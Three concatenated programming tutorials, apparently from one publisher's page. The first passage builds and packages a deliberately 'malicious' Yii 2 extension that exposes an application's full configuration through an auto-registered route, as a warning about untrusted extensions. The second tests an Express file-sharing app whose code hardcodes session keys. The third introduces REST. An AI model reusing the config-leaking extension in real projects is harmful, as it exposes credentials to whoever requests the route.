With this preparation, the bootstrap() method will be called at the start of the application, provided we wire everything up correctly. But first, we should consider how we manipulate the application to make use of our controller. This is easy, really, because there's the yii\web\Application::$controllerMap property (don't forget that it's inherited from yii\base\Module, though). We'll just do the following inside the bootstrap() method:

```php
$app->controllerMap['app-info'] = 'malicious\AppInfoController';
```

We will rely on the composer and Yii 2 autoloaders to actually find malicious\AppInfoController. Just imagine what you can do inside the bootstrap. For example, you could open a CURL connection to some botnet and send the accumulated application information there. Never trust random extensions on the Web.

This actually concludes what we need to do to complete our extension. All that's left now is to make our extension installable in the same way as the other Yii 2 extensions we have been using up until now. If you need to attach this malicious extension to your application manually, and you have a folder holding the code base of the extension at the path /some/filesystem/path, then all you need to do is write the following code inside the application configuration:

```php
'extensions' => array_merge(
    (require __DIR__ . '/../vendor/yiisoft/extensions.php'),
    [
        'malicious/app-info' => [
            'name' => 'Application Information Dumper',
            'version' => '1.0.0',
            'bootstrap' => 'malicious\Bootstrap',
            'alias' => ['@malicious' => '/some/filesystem/path'] // that's the path to the extension
        ]
    ]
)
```

Please note the exact way of specifying the extensions setting: we're merging the contents of the extensions.php file supplied by the Yii 2 distribution from composer with our own manual definition of the extension. This extensions.php file is what allows Yiisoft to distribute its extensions in such a way that you are able to install them with a single composer require invocation. Let's learn now what we need to do to repeat this feature.

Making the extension installable as... erm, extension

First, to make it clear: we are talking here only about the situation where Yii 2 is installed by composer, and we want our extension to be installable through composer as well. This gives us the baseline for all of our assumptions. Let's recall the extensions we have installed so far:

- Gii, the code generator
- The Twitter Bootstrap extension
- The Debug extension
- The SwiftMailer extension

We installed all of these extensions using composer, and we introduced the extensions.php file reference when we installed the Gii extension. Have a look at the following code:

```php
'extensions' => (require __DIR__ . '/../vendor/yiisoft/extensions.php')
```

If we open the vendor/yiisoft/extensions.php file (given that all the extensions from the preceding list were installed) and look at its contents, we'll see the following code (note that in your installation it can be different):
```php
<?php

$vendorDir = dirname(__DIR__);

return array(
    'yiisoft/yii2-bootstrap' => array(
        'name' => 'yiisoft/yii2-bootstrap',
        'version' => '9999999-dev',
        'alias' => array(
            '@yii/bootstrap' => $vendorDir . '/yiisoft/yii2-bootstrap',
        ),
    ),
    'yiisoft/yii2-swiftmailer' => array(
        'name' => 'yiisoft/yii2-swiftmailer',
        'version' => '9999999-dev',
        'alias' => array(
            '@yii/swiftmailer' => $vendorDir . '/yiisoft/yii2-swiftmailer',
        ),
    ),
    'yiisoft/yii2-debug' => array(
        'name' => 'yiisoft/yii2-debug',
        'version' => '9999999-dev',
        'alias' => array(
            '@yii/debug' => $vendorDir . '/yiisoft/yii2-debug',
        ),
    ),
    'yiisoft/yii2-gii' => array(
        'name' => 'yiisoft/yii2-gii',
        'version' => '9999999-dev',
        'alias' => array(
            '@yii/gii' => $vendorDir . '/yiisoft/yii2-gii',
        ),
    ),
);
```

So, what does all this mean to us?

- First, it means that Yii 2 somehow generates the required configuration snippet automatically when you install an extension's composer package.
- Second, it means that each extension provided by the Yii 2 framework distribution will ultimately be registered in the extensions setting of the application.
- Third, all the classes in the extensions are made available to the main application code base by the carefully crafted alias settings inside the extension configuration.
- Fourth, the easy installation of Yii 2 extensions is ultimately made possible by some integration between the Yii framework and the composer distribution system.

The magic is hidden inside the composer.json manifests of the extensions built into Yii 2. The details about the structure of this manifest are written in the composer documentation, available at https://getcomposer.org/doc/04-schema.md. We'll need only one field, though: type. Yii 2 employs a special type of composer package, named yii2-extension. If you check the manifests of yii2-debug, yii2-swiftmailer, and the other extensions, you'll see that they all have the following line inside:

```json
"type": "yii2-extension",
```

Normally, composer will not understand that this type of package is to be installed. But the main yii2 package, containing the framework itself, depends on the special auxiliary yii2-composer package:

```json
"require": {
    ... other requirements ...
    "yiisoft/yii2-composer": "*",
```

This package provides a Composer Custom Installer (read about it at https://getcomposer.org/doc/articles/custom-installers.md), which enables this package type. The whole point of the yii2-extension package type is to automatically update the extensions.php file with the information from the extension's manifest file. Basically, all we need to do now is craft the correct composer.json manifest file inside the extension's code base. Let's write it step by step.

Preparing the correct composer.json manifest

We first need a block with identity information. Have a look at the following lines of code:

```json
"name": "malicious/app-info",
"version": "1.0.0",
"description": "Example extension which reveals important information about the application",
"keywords": ["yii2", "application-info", "example-extension"],
"license": "CC-0",
```

Technically, we must provide only name. Even version can be omitted if our package meets two prerequisites:

- It is distributed from some version control system repository, such as a Git repository
- It has tags in this repository, correctly identifying the versions in the commit history

And we do not want to bother with that right now. Next, we need to depend on the Yii 2 framework, just in case.
Normally, users will install the extension after the framework is already in place. But in the case of the extension already being listed in the require section of composer.json, among other things, we cannot be sure about the exact ordering of the require statements, so it's better (and easier) to just declare the dependency explicitly, as follows:

```json
"require": {
    "yiisoft/yii2": "*"
},
```

Then, we must provide the type:

```json
"type": "yii2-extension",
```

After this, for the Yii 2 extension installer, we have to provide two additional blocks. The autoload block will be used to correctly fill the alias section of the extension configuration:

```json
"autoload": {
    "psr-4": {
        "malicious\\": ""
    }
},
```

What we basically mean by this is that our classes are laid out according to PSR-4 rules, in such a way that the classes in the malicious namespace are placed right inside the root folder. The second block is extra, in which we tell the installer that we want to declare a bootstrap section for the extension configuration:

```json
"extra": {
    "bootstrap": "malicious\\Bootstrap"
},
```

Our manifest file is complete now. Commit everything to the version control system:

```
$ git commit -a -m "Added the Composer manifest file to repo"
```

Now, we'll add the tag at last, corresponding to the version we declared:

```
$ git tag 1.0.0
```

We already mentioned earlier why we're doing this. All that's left is to tell composer where to fetch the extension contents from.
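For reference, the fragments above assemble into a composer.json along these lines. This is assembled here for convenience from the pieces the article builds step by step; only the fields shown are needed for the Yii 2 installer to do its work:

```json
{
    "name": "malicious/app-info",
    "version": "1.0.0",
    "description": "Example extension which reveals important information about the application",
    "keywords": ["yii2", "application-info", "example-extension"],
    "license": "CC-0",
    "type": "yii2-extension",
    "require": {
        "yiisoft/yii2": "*"
    },
    "autoload": {
        "psr-4": {
            "malicious\\": ""
        }
    },
    "extra": {
        "bootstrap": "malicious\\Bootstrap"
    }
}
```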
Configuring the repositories

We need to configure some kind of repository for the extension now so that it is installable. The easiest way is to use the Packagist service, available at https://packagist.org/, which has seamless integration with composer. It has the following pro and con:

- Pro: You don't need to declare anything additional in the composer.json file of the application you want to attach the extension to.
- Con: You must have a public VCS repository (either Git, SVN, or Mercurial) where your extension is published.

In our case, where we are in fact just learning how to install things using composer, we certainly do not want to make our extension public. Do not use Packagist for the extension example we are building in this article.

Let's recall our goal. Our goal is to be able to install our extension by calling the following command at the root of the code base of some Yii 2 application:

```
$ php composer.phar require "malicious/app-info:*"
```

After that, requesting the /app-info/configuration route should return the application configuration as a JSON document (the original article shows a screenshot of this output, rendered with the http://jsonviewer.stack.hu/ web service).

If you put the extension in some public repository, for example on GitHub, and register a package at Packagist, this command will work without any preparation in the composer.json manifest file of the target application. But in our case, we will not make this extension public, and so we have two options left.

The first option, which is perfectly suited to our learning cause, is to use the archived package directly. For this, you have to add a repositories section to the composer.json in the code base of the application you want to add the extension to:

```json
"repositories": [
    // definitions of repositories for the packages required by this application
]
```

To specify the repository for a package that should be installed from a ZIP archive, you have to grab the entire contents of the composer.json manifest file of this package (in our case, our malicious/app-info extension) and put them, verbatim, as an element of the repositories section. This is the most complex way to set up a composer package requirement, but in return you can depend on absolutely any folder with files (packaged into an archive). Of course, the contents of the extension's composer.json do not specify the actual location of the extension's files; you have to add this to repositories manually. In the end, you should have the following additional section inside the composer.json manifest file of the target application:

```json
"repositories": [
    {
        "type": "package",
        "package": {
            // ... skipping whatever was copied verbatim from the composer.json of the extension ...
            "dist": {
                "url": "/home/vagrant/malicious.zip", // example file location
                "type": "zip"
            }
        }
    }
]
```

This way, we specify the location of the package in the filesystem of the same machine and tell composer that this package is a ZIP archive. Now, you should just zip the contents of the yii2-malicious folder we created for the extension, put the archive somewhere on the target machine, and provide the correct URL. Please note that it's necessary to archive only the contents of the extension and not the folder itself. After this, you run composer on the machine that actually has this URL accessible (you can use http:// URLs too, of course), and composer will report a successful installation.

To check that Yii 2 really installed the extension, you can open the vendor/yiisoft/extensions.php file and check whether it now contains the following block:

```php
'malicious/app-info' =>
array (
  'name' => 'malicious/app-info',
  'version' => '1.0.0.0',
  'alias' =>
  array (
    '@malicious' => $vendorDir . '/malicious/app-info',
  ),
  'bootstrap' => 'malicious\\Bootstrap',
),
```

(The indentation was preserved as is from the actual file.) If this block is indeed there, all you need to do is open the /app-info/configuration route and see whether it reports JSON to you. It should.

The pros and cons of the file-based installation are as follows:

| Pros | Cons |
| --- | --- |
| You can specify any file, as long as it is reachable by some URL, and ZIP archive management capabilities exist on virtually any platform today. | There is too much work in the composer.json manifest file of the target application. The requirement to copy the entire manifest into the repositories section is overwhelming and leads to code duplication. |
| You don't need to set up any version control system repository. (It's of dubious benefit, though.) | The manifest from the extension package will not be processed at all. This means you cannot just strip the entry in repositories down to the dist and name sections, because the Yii 2 installer will not be able to get to the autoload and extra sections. |

The last method is to use a local version control system repository. We already have everything committed to the Git repository, and we have the correct tag placed, corresponding to the version we declared in the manifest. This is everything we need to prepare inside the extension itself.
Now, we need to modify the target application's manifest to add the repositories section in the same way as we did previously, but this time we will introduce a lot less code there:

```json
"repositories": [
    {
        "type": "git",
        "url": "/home/vagrant/yii2-malicious/" // put your own URL here
    }
]
```

All that's needed from you is to specify the correct URL to the Git repository of the extension we prepared at the beginning of this article. After you specify this repository in the target application's composer manifest, you can just issue the desired command:

```
$ php composer.phar require "malicious/app-info:1.0.0"
```

Everything will be installed as usual. Confirm the successful installation again by having a look at the contents of vendor/yiisoft/extensions.php and by accessing the /app-info/configuration route in the application.

The pros and cons of the repository-based installation are as follows:

- Pro: Relatively little code to write in the application's manifest.
- Pro: You don't need to actually publish your extension (or the package in general). In some settings this is really useful, for closed-source software, for example.
- Con: You still have to meddle with the manifest of the application itself, which can be out of your control. In this case, you'll have to guide your users on how to install your extension, which is not good for PR.

In short, the following pieces inside the composer.json manifest turn an arbitrary composer package into a Yii 2 extension:

1. First, we tell composer to use the special Yii 2 installer for packages:

```json
"type": "yii2-extension"
```

2. Then, we tell the Yii 2 extension installer where the bootstrap for the extension (if any) is:

```json
"extra": {
    "bootstrap": "<fully qualified class name>"
}
```

3. Next, we tell the Yii 2 extension installer how to prepare aliases for the extension so that its classes can be autoloaded:

```json
"autoload": {
    "psr-4": {
        "<namespace>\\": "<folder path>"
    }
}
```

4. Finally, we add the explicit requirement of the Yii 2 framework itself, so we can be sure that the Yii 2 extension installer will be installed at all:

```json
"require": {
    "yiisoft/yii2": "*"
}
```

Everything else is the same as the installation details of any other composer package, which you can read about in the official composer documentation.

Summary

In this article, we looked at how Yii 2 implements its extensions so that they're easily installable by a single composer invocation and can be automatically attached to the application afterwards. We learned that this requires some level of integration between these two systems, Yii 2 and composer, which in turn requires some additional preparation from you as the developer of the extension.

We used a really silly, even slightly dangerous, example extension. This was for three reasons:

- The extension was fun to make (we hope).
- We showed that using the bootstrap mechanics, we can automatically wire up the pieces of an extension to the target application, without any need for elaborate manual installation instructions.
- We showed the potential danger in installing random extensions from the Web, as an extension can run absolutely arbitrary code right at the application initialization and, more than that, at each request made to the application.

We discussed three methods of distribution of composer packages, which also apply to Yii 2 extensions. The general rule of thumb is this: if you want your extension to be publicly available, just use the Packagist service.
In any other case, use local repositories, as you can use both local filesystem paths and web URLs. We also looked at the option of attaching the extension completely manually, without using the composer installation at all.

Resources for Article:

Further resources on this subject:
- Yii: Adding Users and User Management to Your Site [Article]
- Meet Yii [Article]
- Yii 1.1: Using Zii Components [Article]
Improving Code Quality

Packt
22 Sep 2014
18 min read
In this article by Alexandru Vlăduţu, author of Mastering Web Application Development with Express, we are going to see how to test Express applications and how to improve the quality of our code by leveraging existing NPM modules. (For more resources related to this topic, see here.) Creating and testing an Express file-sharing application Now, it's time to see how to develop and test an Express application with what we have learned previously. We will create a file-sharing application that allows users to upload files and password-protect them if they choose to. After uploading a file to the server, we will create a unique ID for that file, store the metadata along with the content (as a separate JSON file), and redirect the user to the file's information page. When trying to access a password-protected file, an HTTP basic authentication pop-up will appear, and the user will only have to enter the password (there is no username in this case). The package.json file, so far, will contain the following code:

{
  "name": "file-uploading-service",
  "version": "0.0.1",
  "private": true,
  "scripts": {
    "start": "node ./bin/www"
  },
  "dependencies": {
    "express": "~4.2.0",
    "static-favicon": "~1.0.0",
    "morgan": "~1.0.0",
    "cookie-parser": "~1.0.1",
    "body-parser": "~1.0.0",
    "debug": "~0.7.4",
    "ejs": "~0.8.5",
    "connect-multiparty": "~1.0.5",
    "cuid": "~1.2.4",
    "bcrypt": "~0.7.8",
    "basic-auth-connect": "~1.0.0",
    "errto": "~0.2.1",
    "custom-err": "0.0.2",
    "lodash": "~2.4.1",
    "csurf": "~1.2.2",
    "cookie-session": "~1.0.2",
    "secure-filters": "~1.0.5",
    "supertest": "~0.13.0",
    "async": "~0.9.0"
  },
  "devDependencies": { }
}

When bootstrapping an Express application using the CLI, a /bin/www file is automatically created for you. The following is the version we have adopted, which extracts the name of the application from the package.json file. This way, in case we decide to change the name, we won't have to alter our debugging code, because it will automatically adapt to the new name:

#!/usr/bin/env node
var pkg = require('../package.json');
var debug = require('debug')(pkg.name + ':main');
var app = require('../app');

app.set('port', process.env.PORT || 3000);

var server = app.listen(app.get('port'), function() {
  debug('Express server listening on port ' + server.address().port);
});

The application configuration will be stored inside config.json:

{
  "filesDir": "files",
  "maxSize": 5
}

The properties listed in the preceding code are the files folder (where the files will be uploaded), which is relative to the root, and the maximum allowed file size, in megabytes. The main file of the application is named app.js and lives in the root. We need the connect-multiparty module to support file uploads, and the csurf and cookie-session modules for CSRF protection. The rest of the dependencies are standard and we have used them before.
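One detail worth noting before reading app.js: the maxSize setting is expressed in megabytes, so it has to be multiplied out into bytes before being handed to the upload middleware. A quick sketch of the conversion, assuming the config.json above:

var config = require('./config.json');

// config.maxSize is in megabytes; the middleware expects a byte count
var maxFilesSize = 1024 * 1024 * config.maxSize; // 5 -> 5242880 bytes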
The full code for the app.js file is as follows: var express = require('express'); var path = require('path'); var favicon = require('static-favicon'); var logger = require('morgan'); var cookieParser = require('cookie-parser'); var session = require('cookie-session'); var bodyParser = require('body-parser'); var multiparty = require('connect-multiparty'); var Err = require('custom-err'); var csrf = require('csurf'); var ejs = require('secure-filters').configure(require('ejs')); var csrfHelper = require('./lib/middleware/csrf-helper'); var homeRouter = require('./routes/index'); var filesRouter = require('./routes/files'); var config = require('./config.json'); var app = express(); var ENV = app.get('env'); // view engine setup app.engine('html', ejs.renderFile); app.set('views', path.join(__dirname, 'views')); app.set('view engine', 'html'); app.use(favicon()); app.use(bodyParser.json()); app.use(bodyParser.urlencoded()); // Limit uploads to X Mb app.use(multiparty({ maxFilesSize: 1024 * 1024 * config.maxSize })); app.use(cookieParser()); app.use(session({ keys: ['rQo2#0s!qkE', 'Q.ZpeR49@9!szAe'] })); app.use(csrf()); // add CSRF helper app.use(csrfHelper); app.use('/', homeRouter); app.use('/files', filesRouter); app.use(express.static(path.join(__dirname, 'public'))); /// catch 404 and forward to error handler app.use(function(req, res, next) { next(Err('Not Found', { status: 404 })); }); /// error handlers // development error handler // will print stacktrace if (ENV === 'development') { app.use(function(err, req, res, next) { res.status(err.status || 500); res.render('error', { message: err.message, error: err }); }); } // production error handler // no stacktraces leaked to user app.use(function(err, req, res, next) { res.status(err.status || 500); res.render('error', { message: err.message, error: {} }); }); module.exports = app; Instead of directly binding the application to a port, we are exporting it, which makes our lives easier when testing with supertest. We won't need to care about things such as the default port availability or specifying a different port environment variable when testing. To avoid having to create the whole input when including the CSRF token, we have created a helper for that inside lib/middleware/csrf-helper.js: module.exports = function(req, res, next) { res.locals.csrf = function() { return "<input type='hidden' name='_csrf' value='" + req.csrfToken() + "' />"; } next(); }; For the password–protection functionality, we will use the bcrypt module and create a separate file inside lib/hash.js for the hash generation and password–compare functionality: var bcrypt = require('bcrypt'); var errTo = require('errto'); var Hash = {}; Hash.generate = function(password, cb) { bcrypt.genSalt(10, errTo(cb, function(salt) { bcrypt.hash(password, salt, errTo(cb, function(hash) { cb(null, hash); })); })); }; Hash.compare = function(password, hash, cb) { bcrypt.compare(password, hash, cb); }; module.exports = Hash; The biggest file of our application will be the file model, because that's where most of the functionality will reside. We will use the cuid() module to create unique IDs for files, and the native fs module to interact with the filesystem. 
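Before we get to the model code, the Hash module defined above can be exercised on its own. Here is a minimal usage sketch (the sample password is arbitrary, and the require path assumes we are sitting at the project root); the model's save and authentication logic rely on exactly this generate/compare pair:

var hash = require('./lib/hash');

hash.generate('s3cret', function(err, hashedPassword) {
  if (err) { throw err; }
  // the hashed value is what ends up stored in the file's metadata
  hash.compare('s3cret', hashedPassword, function(err, match) {
    if (err) { throw err; }
    console.log(match); // true
  });
});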
The following code snippet contains the most important methods for models/file.js: function File(options, id) { this.id = id || cuid(); this.meta = _.pick(options, ['name', 'type', 'size', 'hash', 'uploadedAt']); this.meta.uploadedAt = this.meta.uploadedAt || new Date(); }; File.prototype.save = function(path, password, cb) { var _this = this; this.move(path, errTo(cb, function() { if (!password) { return _this.saveMeta(cb); } hash.generate(password, errTo(cb, function(hashedPassword) { _this.meta.hash = hashedPassword; _this.saveMeta(cb); })); })); }; File.prototype.move = function(path, cb) { fs.rename(path, this.path, cb); }; For the full source code of the file, browse the code bundle. Next, we will create the routes for the file (routes/files.js), which will export an Express router. As mentioned before, the authentication mechanism for password-protected files will be the basic HTTP one, so we will need the basic-auth-connect module. At the beginning of the file, we will include the dependencies and create the router: var express = require('express'); var basicAuth = require('basic-auth-connect'); var errTo = require('errto'); var pkg = require('../package.json'); var File = require('../models/file'); var debug = require('debug')(pkg.name + ':filesRoute'); var router = express.Router(); We will have to create two routes that will include the id parameter in the URL, one for displaying the file information and another one for downloading the file. In both of these cases, we will need to check if the file exists and require user authentication in case it's password-protected. This is an ideal use case for the router.param() function because these actions will be performed each time there is an id parameter in the URL. The code is as follows: router.param('id', function(req, res, next, id) { File.find(id, errTo(next, function(file) { debug('file', file); // populate req.file, will need it later req.file = file; if (file.isPasswordProtected()) { // Password – protected file, check for password using HTTP basic auth basicAuth(function(user, pwd, fn) { if (!pwd) { return fn(); } // ignore user file.authenticate(pwd, errTo(next, function(match) { if (match) { return fn(null, file.id); } fn(); })); })(req, res, next); } else { // Not password – protected, proceed normally next(); } })); }); The rest of the routes are fairly straightforward, using response.download() to send the file to the client, or using response.redirect() after uploading the file: router.get('/', function(req, res, next) { res.render('files/new', { title: 'Upload file' }); }); router.get('/:id.html', function(req, res, next) { res.render('files/show', { id: req.params.id, meta: req.file.meta, isPasswordProtected: req.file.isPasswordProtected(), hash: hash, title: 'Download file ' + req.file.meta.name }); }); router.get('/download/:id', function(req, res, next) { res.download(req.file.path, req.file.meta.name); }); router.post('/', function(req, res, next) { var tempFile = req.files.file; if (!tempFile.size) { return res.redirect('/files'); } var file = new File(tempFile); file.save(tempFile.path, req.body.password, errTo(next, function() { res.redirect('/files/' + file.id + '.html'); })); }); module.exports = router; The view for uploading a file contains a multipart form with a CSRF token inside (views/files/new.html): <%- include ../layout/header.html %> <form action="/files" method="POST" enctype="multipart/form-data"> <div class="form-group"> <label>Choose file:</label> <input type="file" name="file" /> </div> <div 
class="form-group"> <label>Password protect (leave blank otherwise):</label> <input type="password" name="password" /> </div> <div class="form-group"> <%- csrf() %> <input type="submit" /> </div> </form> <%- include ../layout/footer.html %> To display the file's details, we will create another view (views/files/show.html). Besides showing the basic file information, we will display a special message in case the file is password-protected, so that the client is notified that a password should also be shared along with the link: <%- include ../layout/header.html %> <p> <table> <tr> <th>Name</th> <td><%= meta.name %></td> </tr> <th>Type</th> <td><%= meta.type %></td> </tr> <th>Size</th> <td><%= meta.size %> bytes</td> </tr> <th>Uploaded at</th> <td><%= meta.uploadedAt %></td> </tr> </table> </p> <p> <a href="/files/download/<%- id %>">Download file</a> | <a href="/files">Upload new file</a> </p> <p> To share this file with your friends use the <a href="/files/<%- id %>">current link</a>. <% if (isPasswordProtected) { %> <br /> Don't forget to tell them the file password as well! <% } %> </p> <%- include ../layout/footer.html %> Running the application To run the application, we need to install the dependencies and run the start script: $ npm i $ npm start The default port for the application is 3000, so if we visit http://localhost:3000/files, we should see the following page: After uploading the file, we should be redirected to the file's page, where its details will be displayed: Unit tests Unit testing allows us to test individual parts of our code in isolation and verify their correctness. By making our tests focused on these small components, we decrease the complexity of the setup, and most likely, our tests should execute faster. Using the following command, we'll install a few modules to help us in our quest: $ npm i mocha should sinon––save-dev We are going to write unit tests for our file model, but there's nothing stopping us from doing the same thing for our routes or other files from /lib. The dependencies will be listed at the top of the file (test/unit/file-model.js): var should = require('should'); var path = require('path'); var config = require('../../config.json'); var sinon = require('sinon'); We will also need to require the native fs module and the hash module, because these modules will be stubbed later on. 
Apart from these, we will create an empty callback function and reuse it, as shown in the following code: // will be stubbing methods on these modules later on var fs = require('fs'); var hash = require('../../lib/hash'); var noop = function() {}; The tests for the instance methods will be created first: describe('models', function() { describe('File', function() { var File = require('../../models/file'); it('should have default properties', function() { var file = new File(); file.id.should.be.a.String; file.meta.uploadedAt.should.be.a.Date; }); it('should return the path based on the root and the file id', function() { var file = new File({}, '1'); file.path.should.eql(File.dir + '/1'); }); it('should move a file', function() { var stub = sinon.stub(fs, 'rename'); var file = new File({}, '1'); file.move('/from/path', noop); stub.calledOnce.should.be.true; stub.calledWith('/from/path', File.dir + '/1', noop).should.be.true; stub.restore(); }); it('should save the metadata', function() { var stub = sinon.stub(fs, 'writeFile'); var file = new File({}, '1'); file.meta = { a: 1, b: 2 }; file.saveMeta(noop); stub.calledOnce.should.be.true; stub.calledWith(File.dir + '/1.json', JSON.stringify(file.meta), noop).should.be.true; stub.restore(); }); it('should check if file is password protected', function() { var file = new File({}, '1'); file.meta.hash = 'y'; file.isPasswordProtected().should.be.true; file.meta.hash = null; file.isPasswordProtected().should.be.false; }); it('should allow access if matched file password', function() { var stub = sinon.stub(hash, 'compare'); var file = new File({}, '1'); file.meta.hash = 'hashedPwd'; file.authenticate('password', noop); stub.calledOnce.should.be.true; stub.calledWith('password', 'hashedPwd', noop).should.be.true; stub.restore(); }); We are stubbing the functionalities of the fs and hash modules because we want to test our code in isolation. Once we are done with the tests, we restore the original functionality of the methods. Now that we're done testing the instance methods, we will go on to test the static ones (assigned directly onto the File object): describe('.dir', function() { it('should return the root of the files folder', function() { path.resolve(__dirname + '/../../' + config.filesDir).should.eql(File.dir); }); }); describe('.exists', function() { var stub; beforeEach(function() { stub = sinon.stub(fs, 'exists'); }); afterEach(function() { stub.restore(); }); it('should callback with an error when the file does not exist', function(done) { File.exists('unknown', function(err) { err.should.be.an.instanceOf(Error).and.have.property('status', 404); done(); }); // call the function passed as argument[1] with the parameter `false` stub.callArgWith(1, false); }); it('should callback with no arguments when the file exists', function(done) { File.exists('existing-file', function(err) { (typeof err === 'undefined').should.be.true; done(); }); // call the function passed as argument[1] with the parameter `true` stub.callArgWith(1, true); }); }); }); }); To stub asynchronous functions and execute their callback, we use the stub.callArgWith() function provided by sinon, which executes the callback provided by the argument with the index <<number>> of the stub with the subsequent arguments. For more information, check out the official documentation at http://sinonjs.org/docs/#stubs. When running tests, Node developers expect the npm test command to be the command that triggers the test suite, so we need to add that script to our package.json file. 
However, since we are going to have different tests to be run, it would be even better to add a unit-tests script and make npm test run that for now. The scripts property should look like the following code: "scripts": { "start": "node ./bin/www", "unit-tests": "mocha --reporter=spec test/unit", "test": "npm run unit-tests" }, Now, if we run the tests, we should see the following output in the terminal: Functional tests So far, we have tested each method to check whether it works fine on its own, but now, it's time to check whether our application works according to the specifications when wiring all the things together. Besides the existing modules, we will need to install and use the following ones: supertest: This is used to test the routes in an expressive manner cheerio: This is used to extract the CSRF token out of the form and pass it along when uploading the file rimraf: This is used to clean up our files folder once we're done with the testing We will create a new file called test/functional/files-routes.js for the functional tests. As usual, we will list our dependencies first: var fs = require('fs'); var request = require('supertest'); var should = require('should'); var async = require('async'); var cheerio = require('cheerio'); var rimraf = require('rimraf'); var app = require('../../app'); There will be a couple of scenarios to test when uploading a file, such as: Checking whether a file that is uploaded without a password can be publicly accessible Checking that a password-protected file can only be accessed with the correct password We will create a function called uploadFile that we can reuse across different tests. This function will use the same supertest agent when making requests so it can persist the cookies, and will also take care of extracting and sending the CSRF token back to the server when making the post request. In case a password argument is provided, it will send that along with the file. The function will assert that the status code for the upload page is 200 and that the user is redirected to the file page after the upload. 
The full code of the function is listed as follows:

function uploadFile(agent, password, done) {
  agent
    .get('/files')
    .expect(200)
    .end(function(err, res) {
      (err == null).should.be.true;
      var $ = cheerio.load(res.text);
      var csrfToken = $('form input[name=_csrf]').val();
      csrfToken.should.not.be.empty;

      var req = agent
        .post('/files')
        .field('_csrf', csrfToken)
        .attach('file', __filename);

      if (password) {
        req = req.field('password', password);
      }

      req
        .expect(302)
        .expect('Location', /files\/(.*)\.html/)
        .end(function(err, res) {
          (err == null).should.be.true;
          var fileUid = res.headers['location'].match(/files\/(.*)\.html/)[1];
          done(null, fileUid);
        });
    });
}

Note that we will use rimraf in an after function to clean up the files folder, but it would be best to have a separate path for uploading files while testing (other than the one used for development and production):

describe('Files-Routes', function() {
  after(function() {
    var filesDir = __dirname + '/../../files';
    rimraf.sync(filesDir);
    fs.mkdirSync(filesDir);
  });

When testing the file uploads, we want to make sure that, without the correct password being provided, access will not be granted to the file pages:

  describe("Uploading a file", function() {
    it("should upload a file without password protecting it", function(done) {
      var agent = request.agent(app);
      uploadFile(agent, null, done);
    });

    it("should upload a file and password protect it", function(done) {
      var agent = request.agent(app);
      var pwd = 'sample-password';

      uploadFile(agent, pwd, function(err, filename) {
        async.parallel([
          function getWithoutPwd(next) {
            agent
              .get('/files/' + filename + '.html')
              .expect(401)
              .end(function(err, res) {
                (err == null).should.be.true;
                next();
              });
          },
          function getWithPwd(next) {
            agent
              .get('/files/' + filename + '.html')
              .set('Authorization', 'Basic ' + new Buffer(':' + pwd).toString('base64'))
              .expect(200)
              .end(function(err, res) {
                (err == null).should.be.true;
                next();
              });
          }
        ], function(err) {
          (err == null).should.be.true;
          done();
        });
      });
    });
  });
});

It's time to do the same thing we did for the unit tests: add a script so that we can run the functional tests with npm run functional-tests. At the same time, we should update the npm test script to include both our unit tests and our functional tests:

"scripts": {
  "start": "node ./bin/www",
  "unit-tests": "mocha --reporter=spec test/unit",
  "functional-tests": "mocha --reporter=spec --timeout=10000 --slow=2000 test/functional",
  "test": "npm run unit-tests && npm run functional-tests"
}

If we run the tests, we should see the following output: Running tests before committing in Git It's a good practice to run the test suite before committing to git and to only let the commit proceed if the tests have executed successfully. The same applies to other version control systems. To achieve this, we should add the .git/hooks/pre-commit file, which should take care of running the tests and exiting with an error in case they failed. Luckily, this is a repetitive task (which applies to all Node applications), so there is an NPM module that creates this hook file for us. All we need to do is install the pre-commit module (https://www.npmjs.org/package/pre-commit) as a development dependency, using the following command:

$ npm i pre-commit --save-dev

This should automatically create the pre-commit hook file so that all the tests are run before committing (using the npm test command). The pre-commit module also supports running custom scripts specified in the package.json file.
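A sketch of such a configuration, reusing the scripts we defined earlier (the pre-commit key is the one documented by the module; the script names are our own):

"pre-commit": ["unit-tests", "functional-tests"]

With this entry in package.json, both suites run before every commit instead of the default npm test script.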
For more details on how to achieve that, read the module documentation at https://www.npmjs.org/package/pre-commit. Summary In this article, we have learned about writing tests for Express applications and in the process, explored a variety of helpful modules. Resources for Article: Further resources on this subject: Web Services Testing and soapUI [article] ExtGWT Rich Internet Application: Crafting UI Real Estate [article] Rendering web pages to PDF using Railo Open Source [article]
What is REST?

Packt
17 Sep 2014
12 min read
This article by Bhakti Mehta, the author of Restful Java Patterns and Best Practices, starts with the basic concepts of REST, how to design RESTful services, and best practices around designing REST resources. It also covers the architectural aspects of REST. (For more resources related to this topic, see here.) Where REST has come from The confluence of social networking, cloud computing, and era of mobile applications creates a generation of emerging technologies that allow different networked devices to communicate with each other over the Internet. In the past, there were traditional and proprietary approaches for building solutions encompassing different devices and components communicating with each other over a non-reliable network or through the Internet. Some of these approaches such as RPC, CORBA, and SOAP-based web services, which evolved as different implementations for Service Oriented Architecture (SOA) required a tighter coupling between components along with greater complexities in integration. As the technology landscape evolves, today’s applications are built on the notion of producing and consuming APIs instead of using web frameworks that invoke services and produce web pages. This requirement enforces the need for easier exchange of information between distributed services along with predictable, robust, well-defined interfaces. API based architecture enables agile development, easier adoption and prevalence, scale and integration with applications within and outside the enterprise HTTP 1.1 is defined in RFC 2616, and is ubiquitously used as the standard protocol for distributed, collaborative and hypermedia information systems. Representational State Transfer (REST) is inspired by HTTP and can be used wherever HTTP is used. The widespread adoption of REST and JSON opens up the possibilities of applications incorporating and leveraging functionality from other applications as needed. Popularity of REST is mainly because it enables building lightweight, simple, cost-effective modular interfaces, which can be consumed by a variety of clients. This article covers the following topics Introduction to REST Safety and Idempotence HTTP verbs and REST Best practices when designing RESTful services REST architectural components Introduction to REST REST is an architectural style that conforms to the Web Standards like using HTTP verbs and URIs. It is bound by the following principles. All resources are identified by the URIs. All resources can have multiple representations All resources can be accessed/modified/created/deleted by standard HTTP methods. There is no state on the server. REST is extensible due to the use of URIs for identifying resources. For example, a URI to represent a collection of book resources could look like this: http://foo.api.com/v1/library/books A URI to represent a single book identified by its ISBN could be as follows: http://foo.api.com/v1/library/books/isbn/12345678 A URI to represent a coffee order resource could be as follows: http://bar.api.com/v1/coffees/orders/1234 A user in a system can be represented like this: http://some.api.com/v1/user A URI to represent all the book orders for a user could be: http://bar.api.com/v1/user/5034/book/orders All the preceding samples show a clear readable pattern, which can be interpreted by the client. All these resources could have multiple representations. These resource examples shown here can be represented by JSON or XML and can be manipulated by HTTP methods: GET, PUT, POST, and DELETE. 
